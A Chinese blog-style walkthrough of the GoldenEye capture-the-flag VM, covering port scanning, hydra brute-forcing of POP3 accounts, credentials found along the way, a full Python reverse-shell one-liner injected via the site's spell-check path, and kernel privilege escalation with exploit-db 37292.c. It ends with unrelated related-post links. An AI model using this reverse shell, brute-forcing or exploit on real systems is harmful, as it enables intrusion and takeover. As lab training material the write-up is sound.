GoldenEye
靶机准备
将靶机ova文件导入虚拟机,并将网络模式设置为NAT

先进行ip扫描
netdiscover -r 192.168.164.0/24

kali:192.168.164.137
渗透测试
扫描端口
nmap -sS -sV -T5 -A -p- 192.168.164.189

开放了4个端口
访问80端口

给了一个路径,访问

需要登录
访问源码,发现js文件,查看源码,里面有线索


尝试解密

boris/InvincibleHack3r
尝试登录

到这再查看源码,找不到其他的东西,先放一放,刚刚扫描还发现55006,55007开放,扫一下是什么服务,
nmap -Pn -p 55006,55007 -sV 192.168.164.189

是pop,尝试连接
nc 192.168.164.189 55007

失败,在源码最后发现另一个账户:Natalya

将用户保存到文本,尝试爆破

hydra -L 2.txt -P /usr/share/wordlists/fasttrack.txxt pop3://192.168.164.189 -s 55007



共得到三个
Natalya/bird
boris/secret1!
Boris/secret1!
尝试boris/secret1!登录,没有发现有用的信息

尝试Natalya/bird登录

发现另一个用户信息,并修改Host文件severnaya-station.com进行访问。
username: xenia
password: RCP90rulez!

成功登录

经过几番查找,又发现一个账户:doak,继续爆破

获得doak的密码
doak/goat
连接pop3,又发现一个用户信息

username: dr_doak
password: 4England!
在网站登录此用户,寻找信息
找到一个文本文件,下载查看

并且发现一个admin用户

并在下载的文件中发现一个照片的路径

尝试访问

下载下来分析
在属看见一串base64编码,尝试解码,


xWinter1995x!
刚刚有个admin用户,猜测是他的密码,网站尝试登录
成功登录

getshell
使用了管理员admin用户登录页面,可以进行网站管理,在页面中找到了Site administration-Server- System paths
可以上传代码使用Python代码,进行反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.164.137",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

本地开启端口1234
将Spell engine改为PSpellShell


拿到shell

不是root权限尝试提权
提权
查看内核
uname -a

searchsploit查找linux内核漏洞
searchsploit 3.13

漏洞进行利用
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root

ssh上传
开启:/etc/init.d/ssh start
scp root@192.168.56.129:/root/1.c /tmp/


对c文件进行编译,有gcc,cc,cang,文件默认是gcc
靶机gcc未编译好,不能用gcc,只能用cc编译,需要修改37292.c编译

修改重新上传

用cc编译,赋予可执行权限后,运行exp

得到root权限,在root目录下找到flag

GoldenEye的更多相关文章
- Goldeneye.py网站压力测试工具2.1版源码
Goldeneye压力测试工具的源代码,粗略看了下,代码写的蛮规范和易读的,打算边读边加上了中文注释,但是想来也没太大必要,代码600多行,值得学习的地方还是蛮多的,喜欢Python的同学可以一读 这 ...
- 阿里 Goldeneye 四个环节落地智能监控:预测、检测、报警及定位
阿里 Goldeneye 四个环节落地智能监控:预测.检测.报警及定位 https://www.infoq.cn/article/alibaba-goldeneye-four-links
- GoldenEye靶机work_through暨CVE-2013-3630复现
前言 备考OSCP,所以接下来会做一系列的OSCP向靶机来练手 靶机描述 I recently got done creating an OSCP type vulnerable machine th ...
- 【原创】项目一GoldenEye
实战流程 1,通过nmap查找本段IP中存活的机器 ┌──(root㉿whoami)-[/home/whoami/Desktop] └─# nmap -sP 192.168.186.0/24 排查网关 ...
- Goldeneye 靶机过关记录
注:因记录时间不同,记录中1.111和1.105均为靶机地址. 1信息收集 1.1得到目标,相关界面如下: 1.2简单信息收集 wappalyzer插件显示: web服务器:Apache 2.4.7 ...
- Spark机器学习读书笔记-CH03
3.1.获取数据: wget http://files.grouplens.org/datasets/movielens/ml-100k.zip 3.2.探索与可视化数据: In [3]: user_ ...
- HackPorts – Mac OS X 渗透测试框架与工具
HackPorts是一个OS X 下的一个渗透框架. HackPorts是一个“超级工程”,充分利用现有的代码移植工作,安全专业人员现在可以使用数以百计的渗透工具在Mac系统中,而不需要虚拟机. 工具 ...
- linux 后台运行程序
有些时候,我们需要在终端启动一个程序,并使之运行--但是如果关闭终端,那么这个程序也就随着关闭了.那么有没有什么方法在关闭终端后,让已经从这个终端启动的程序继续运行呢? 前置知识: xterm,con ...
- Azure上Linux VM DDOS攻击预防: 慢速攻击
在上篇博客(http://www.cnblogs.com/cloudapps/p/4996046.html)中,介绍了如何使用Apache的模块mod_evasive进行反DDOS攻击的设置,在这种模 ...
随机推荐
- Solution -「ARC 063D」「AT 2149」Snuke's Coloring 2
\(\mathcal{Decription}\) Link. 平面上有一个左下角坐标 \((0,0)\) 右上角坐标 \((W,H)\) 的矩形,起初长方形内部被涂白. 现在给定 \(n\) ...
- v80.01 鸿蒙内核源码分析(内核态锁篇) | 如何实现快锁Futex(下) | 百篇博客分析OpenHarmony源码
百篇博客分析|本篇为:(内核态锁篇) | 如何实现快锁Futex(下) 进程通讯相关篇为: v26.08 鸿蒙内核源码分析(自旋锁) | 当立贞节牌坊的好同志 v27.05 鸿蒙内核源码分析(互斥锁) ...
- DDD与数据事务脚本
DDD与数据事务脚本 扯淡 相信点进来看这篇文章的同学,大部分是因为标题里面的"DDD"所吸引!DDD并不是一个新技术,如果你百度一下它的历史就会知道,实际上它诞生于2004年, ...
- 手把手教你如何通过CC2531抓取Zigbee包,并解析加密Zigbee包
前言 好久不见啊,大伙假期过得咋样? 最近我在研究 Zigbee ,使用了EFR32(购买链接)的开发板,之前也研究过一点,水了几篇文章,但是没有深了解和使用.最近 arduino 玩腻了,我开始回过 ...
- .Net Core之选项模式Options使用
一.简要阐述 ASP.NET Core引入了Options模式,使用类来表示相关的设置组.简单的来说,就是用强类型的类来表达配置项,这带来了很多好处.利用了系统的依赖注入,并且还可以利用配置系统.它使 ...
- 【C# .Net GC】手动监视和控制对象的生命周期(GCHandle)
这个话题还未做详细研究,暂时用不到,只是粗略看了一下. 使用System.Runtime.InteropServices.GCHandle类来手动控制对象的生命周期 (个人感觉这里可能有一些问题... ...
- 在vs2022环境中用C#创建COM组件
规则 com组件以接口的方式对外开放. 1:所要导出的类必须为公有: 2:所有属性.方法也必须为公有: 3:要导出的属性.方法必须用接口方式: interface IName { [DispId(1) ...
- WPF优秀组件推荐之LiveCharts
概述 LiveCharts是一个比较漂亮的WPF图表控件,在数据变化时还会有动画切换的效果,并且样式也可以控制. 官方网站:Live Charts (lvcharts.net) 开源代码:GitHub ...
- 联邦学习:按混合分布划分Non-IID样本
我们在博文<联邦学习:按病态独立同分布划分Non-IID样本>中学习了联邦学习开山论文[1]中按照病态独立同分布(Pathological Non-IID)划分样本. 在上一篇博文< ...
- 字符集编码(四):UTF
在前面文章<字符集编码(中):Unicode>中我们聊了 Unicode 标准并提到其有三种实现形式:UTF-16.UTF-8 和 UTF-32,本篇我们就具体聊聊这三种 UTF 是怎么实 ...